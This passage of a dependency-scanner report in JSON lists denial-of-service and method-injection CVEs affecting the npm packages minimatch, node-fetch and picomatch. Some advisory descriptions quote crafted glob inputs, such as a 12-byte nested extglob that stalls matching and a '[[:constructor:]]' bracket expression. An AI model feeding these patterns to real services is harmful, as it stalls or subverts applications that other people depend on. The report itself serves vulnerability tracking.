"https://bugzilla.redhat.com/2453151", "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", "https://errata.almalinux.org/9/ALSA-2026-7896.html", "https://errata.rockylinux.org/RLSA-2026:7896", "https://github.com/isaacs/minimatch", "https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce", "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74", "https://linux.oracle.com/cve/CVE-2026-27904.html", "https://linux.oracle.com/errata/ELSA-2026-8339.html", "https://nvd.nist.gov/vuln/detail/CVE-2026-27904", "https://www.cve.org/CVERecord?id=CVE-2026-27904" ], "PublishedDate": "2026-02-26T02:16:21.76Z", "LastModifiedDate": "2026-02-27T17:16:23.773Z" }, { "VulnerabilityID": "CVE-2026-26996", "VendorIDs": [ "GHSA-3ppc-4f35-3m26" ], "PkgID": "minimatch@3.1.2", "PkgName": "minimatch", "PkgIdentifier": { "PURL": "pkg:npm/minimatch@3.1.2", "UID": "2583e427b34671fe" }, "InstalledVersion": "3.1.2", "FixedVersion": "10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26996", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:b44ab3a326153edeb646f41cead290b9f6bf773b40ff9094339ec97fb3135d69", "Title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns", "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "alma": 3, "ghsa": 3, "nvd": 3, "oracle-oval": 3, "redhat": 2, "rocky": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:7896", "https://access.redhat.com/security/cve/CVE-2026-26996", "https://bugzilla.redhat.com/2441268", "https://bugzilla.redhat.com/2442922", "https://bugzilla.redhat.com/2448754", "https://bugzilla.redhat.com/2453151", "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", "https://errata.almalinux.org/9/ALSA-2026-7896.html", "https://errata.rockylinux.org/RLSA-2026:7896", "https://github.com/isaacs/minimatch", "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5", "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26", "https://linux.oracle.com/cve/CVE-2026-26996.html", "https://linux.oracle.com/errata/ELSA-2026-8339.html", "https://nvd.nist.gov/vuln/detail/CVE-2026-26996", "https://www.cve.org/CVERecord?id=CVE-2026-26996" ], "PublishedDate": "2026-02-20T03:16:01.62Z", "LastModifiedDate": "2026-03-06T21:32:10.65Z" }, { "VulnerabilityID": "CVE-2026-27903", "VendorIDs": [ "GHSA-7r86-cg39-jmmj" ], "PkgID": "minimatch@3.1.2", "PkgName": "minimatch", "PkgIdentifier": { "PURL": "pkg:npm/minimatch@3.1.2", "UID": "2583e427b34671fe" }, "InstalledVersion": "3.1.2", "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27903", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:83bcac7a8c219494108df527b08b60f4afef3ee09b8daf3ef8356d68a37738a8", "Title": "minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns", "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.", "Severity": "HIGH", "CweIDs": [ "CWE-407" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-27903", "https://github.com/isaacs/minimatch", "https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748", "https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj", "https://nvd.nist.gov/vuln/detail/CVE-2026-27903", "https://www.cve.org/CVERecord?id=CVE-2026-27903" ], "PublishedDate": "2026-02-26T02:16:21.353Z", "LastModifiedDate": "2026-02-27T17:21:22.37Z" }, { "VulnerabilityID": "CVE-2026-27904", "VendorIDs": [ "GHSA-23c5-xmqv-rm74" ], "PkgID": "minimatch@3.1.2", "PkgName": "minimatch", "PkgIdentifier": { "PURL": "pkg:npm/minimatch@3.1.2", "UID": "2583e427b34671fe" }, "InstalledVersion": "3.1.2", "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27904", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:e3bbca27edb3b4562d57f8d1acc4b58f877a86360924b9939dacdbbf9ace3abe", "Title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions", "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "alma": 3, "ghsa": 3, "oracle-oval": 3, "redhat": 2, "rocky": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:7896", "https://access.redhat.com/security/cve/CVE-2026-27904", "https://bugzilla.redhat.com/2441268", "https://bugzilla.redhat.com/2442922", "https://bugzilla.redhat.com/2448754", "https://bugzilla.redhat.com/2453151", "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", "https://errata.almalinux.org/9/ALSA-2026-7896.html", "https://errata.rockylinux.org/RLSA-2026:7896", "https://github.com/isaacs/minimatch", "https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce", "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74", "https://linux.oracle.com/cve/CVE-2026-27904.html", "https://linux.oracle.com/errata/ELSA-2026-8339.html", "https://nvd.nist.gov/vuln/detail/CVE-2026-27904", "https://www.cve.org/CVERecord?id=CVE-2026-27904" ], "PublishedDate": "2026-02-26T02:16:21.76Z", "LastModifiedDate": "2026-02-27T17:16:23.773Z" }, { "VulnerabilityID": "CVE-2026-26996", "VendorIDs": [ "GHSA-3ppc-4f35-3m26" ], "PkgID": "minimatch@9.0.5", "PkgName": "minimatch", "PkgIdentifier": { "PURL": "pkg:npm/minimatch@9.0.5", "UID": "7218c46a058dde84" }, "InstalledVersion": "9.0.5", "FixedVersion": "10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26996", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:34372e090212d6741432f4b4c898aed34989064222509834e8eb5b6ecd0731b6", "Title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns", "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "alma": 3, "ghsa": 3, "nvd": 3, "oracle-oval": 3, "redhat": 2, "rocky": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:7896", "https://access.redhat.com/security/cve/CVE-2026-26996", "https://bugzilla.redhat.com/2441268", "https://bugzilla.redhat.com/2442922", "https://bugzilla.redhat.com/2448754", "https://bugzilla.redhat.com/2453151", "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", "https://errata.almalinux.org/9/ALSA-2026-7896.html", "https://errata.rockylinux.org/RLSA-2026:7896", "https://github.com/isaacs/minimatch", "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5", "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26", "https://linux.oracle.com/cve/CVE-2026-26996.html", "https://linux.oracle.com/errata/ELSA-2026-8339.html", "https://nvd.nist.gov/vuln/detail/CVE-2026-26996", "https://www.cve.org/CVERecord?id=CVE-2026-26996" ], "PublishedDate": "2026-02-20T03:16:01.62Z", "LastModifiedDate": "2026-03-06T21:32:10.65Z" }, { "VulnerabilityID": "CVE-2026-27903", "VendorIDs": [ "GHSA-7r86-cg39-jmmj" ], "PkgID": "minimatch@9.0.5", "PkgName": "minimatch", "PkgIdentifier": { "PURL": "pkg:npm/minimatch@9.0.5", "UID": "7218c46a058dde84" }, "InstalledVersion": "9.0.5", "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27903", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:1d115a2eca9636952e674dba6cab6369abf253291edf33be16f9b0d910a53ef1", "Title": "minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns", "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.", "Severity": "HIGH", "CweIDs": [ "CWE-407" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-27903", "https://github.com/isaacs/minimatch", "https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748", "https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj", "https://nvd.nist.gov/vuln/detail/CVE-2026-27903", "https://www.cve.org/CVERecord?id=CVE-2026-27903" ], "PublishedDate": "2026-02-26T02:16:21.353Z", "LastModifiedDate": "2026-02-27T17:21:22.37Z" }, { "VulnerabilityID": "CVE-2026-27904", "VendorIDs": [ "GHSA-23c5-xmqv-rm74" ], "PkgID": "minimatch@9.0.5", "PkgName": "minimatch", "PkgIdentifier": { "PURL": "pkg:npm/minimatch@9.0.5", "UID": "7218c46a058dde84" }, "InstalledVersion": "9.0.5", "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27904", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:7b28bfca4e121922e47fc6a816d7d4db836657c5d3ed3772c58bf90ffc028356", "Title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions", "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "alma": 3, "ghsa": 3, "oracle-oval": 3, "redhat": 2, "rocky": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:7896", "https://access.redhat.com/security/cve/CVE-2026-27904", "https://bugzilla.redhat.com/2441268", "https://bugzilla.redhat.com/2442922", "https://bugzilla.redhat.com/2448754", "https://bugzilla.redhat.com/2453151", "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", "https://errata.almalinux.org/9/ALSA-2026-7896.html", "https://errata.rockylinux.org/RLSA-2026:7896", "https://github.com/isaacs/minimatch", "https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce", "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74", "https://linux.oracle.com/cve/CVE-2026-27904.html", "https://linux.oracle.com/errata/ELSA-2026-8339.html", "https://nvd.nist.gov/vuln/detail/CVE-2026-27904", "https://www.cve.org/CVERecord?id=CVE-2026-27904" ], "PublishedDate": "2026-02-26T02:16:21.76Z", "LastModifiedDate": "2026-02-27T17:16:23.773Z" }, { "VulnerabilityID": "CVE-2022-0235", "VendorIDs": [ "GHSA-r683-j2x4-v87g" ], "PkgID": "node-fetch@1.7.3", "PkgName": "node-fetch", "PkgIdentifier": { "PURL": "pkg:npm/node-fetch@1.7.3", "UID": "6acbb9f806f1d654" }, "InstalledVersion": "1.7.3", "FixedVersion": "3.1.1, 2.6.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-0235", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:55fd27f6d22c97995ae7f84a991b0365f33431a3c3fffdc19d21042cbdccc200", "Title": "node-fetch: exposure of sensitive information to an unauthorized actor", "Description": "node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor", "Severity": "HIGH", "CweIDs": [ "CWE-200", "CWE-601" ], "VendorSeverity": { "alma": 2, "ghsa": 3, "nvd": 2, "oracle-oval": 2, "redhat": 2, "rocky": 2, "ubuntu": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "V3Score": 8.8 }, "nvd": { "V2Vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V2Score": 5.8, "V3Score": 6.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N", "V3Score": 6.1 } }, "References": [ "https://access.redhat.com/errata/RHSA-2023:0050", "https://access.redhat.com/security/cve/CVE-2022-0235", "https://bugzilla.redhat.com/2044591", "https://bugzilla.redhat.com/2066009", "https://bugzilla.redhat.com/2134609", "https://bugzilla.redhat.com/2140911", "https://bugzilla.redhat.com/2150323", "https://bugzilla.redhat.com/show_bug.cgi?id=2044591", "https://bugzilla.redhat.com/show_bug.cgi?id=2066009", "https://bugzilla.redhat.com/show_bug.cgi?id=2134609", "https://bugzilla.redhat.com/show_bug.cgi?id=2140911", "https://bugzilla.redhat.com/show_bug.cgi?id=2142821", "https://bugzilla.redhat.com/show_bug.cgi?id=2150323", "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44906", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0235", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24999", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3517", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43548", "https://errata.almalinux.org/8/ALSA-2023-0050.html", "https://errata.rockylinux.org/RLSA-2023:0050", "https://github.com/node-fetch/node-fetch", "https://github.com/node-fetch/node-fetch/commit/1ef4b560a17e644a02a3bfdea7631ffeee578b35", "https://github.com/node-fetch/node-fetch/commit/36e47e8a6406185921e4985dcbeff140d73eaa10", "https://github.com/node-fetch/node-fetch/commit/5c32f002fdd65b1c6a8f1e3620210813d45c7e60", "https://github.com/node-fetch/node-fetch/pull/1449/commits/5c32f002fdd65b1c6a8f1e3620210813d45c7e60", "https://github.com/node-fetch/node-fetch/pull/1453", "https://huntr.dev/bounties/d26ab655-38d6-48b3-be15-f9ad6b6ae6f7", "https://huntr.dev/bounties/d26ab655-38d6-48b3-be15-f9ad6b6ae6f7/", "https://linux.oracle.com/cve/CVE-2022-0235.html", "https://linux.oracle.com/errata/ELSA-2023-0050.html", "https://lists.debian.org/debian-lts-announce/2022/12/msg00007.html", "https://nvd.nist.gov/vuln/detail/CVE-2022-0235", "https://ubuntu.com/security/notices/USN-6158-1", "https://www.cve.org/CVERecord?id=CVE-2022-0235" ], "PublishedDate": "2022-01-16T17:15:07.87Z", "LastModifiedDate": "2024-11-21T06:38:12.15Z" }, { "VulnerabilityID": "CVE-2026-33671", "VendorIDs": [ "GHSA-c2c7-rcm5-vvqj" ], "PkgID": "picomatch@2.3.1", "PkgName": "picomatch", "PkgIdentifier": { "PURL": "pkg:npm/picomatch@2.3.1", "UID": "a3727870b0227353" }, "InstalledVersion": "2.3.1", "FixedVersion": "4.0.4, 3.0.2, 2.3.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33671", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:847c2e83737191fa2547cf63cbc103d43541a125245cd3d7139906aaac252c02", "Title": "picomatch: Picomatch: Regular Expression Denial of Service via crafted extglob patterns", "Description": "Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input. Applications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`. Possible mitigations include disabling extglob support for untrusted patterns by using `noextglob: true`, rejecting or sanitizing patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`, enforcing strict allowlists for accepted pattern syntax, running matching in an isolated worker or separate process with time and resource limits, and applying application-level request throttling and input validation for any endpoint that accepts glob patterns.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "azure": 3, "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-33671", "https://github.com/micromatch/picomatch", "https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d", "https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj", "https://nvd.nist.gov/vuln/detail/CVE-2026-33671", "https://www.cve.org/CVERecord?id=CVE-2026-33671" ], "PublishedDate": "2026-03-26T22:16:30.21Z", "LastModifiedDate": "2026-04-01T13:45:11.687Z" }, { "VulnerabilityID": "CVE-2026-33672", "VendorIDs": [ "GHSA-3v7f-55p6-f55p" ], "PkgID": "picomatch@2.3.1", "PkgName": "picomatch", "PkgIdentifier": { "PURL": "pkg:npm/picomatch@2.3.1", "UID": "a3727870b0227353" }, "InstalledVersion": "2.3.1", "FixedVersion": "4.0.4, 3.0.2, 2.3.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33672", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:3a063d5406d721b1b81f6205f4a154fed1426c45499ab11daf2e4c596e3239c5", "Title": "picomatch: Picomatch: Data integrity compromised via method injection with crafted POSIX bracket expressions", "Description": "Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to a method injection vulnerability affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression. This leads to incorrect glob matching behavior (integrity impact), where patterns may match unintended filenames. The issue does not enable remote code execution, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control. All users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing 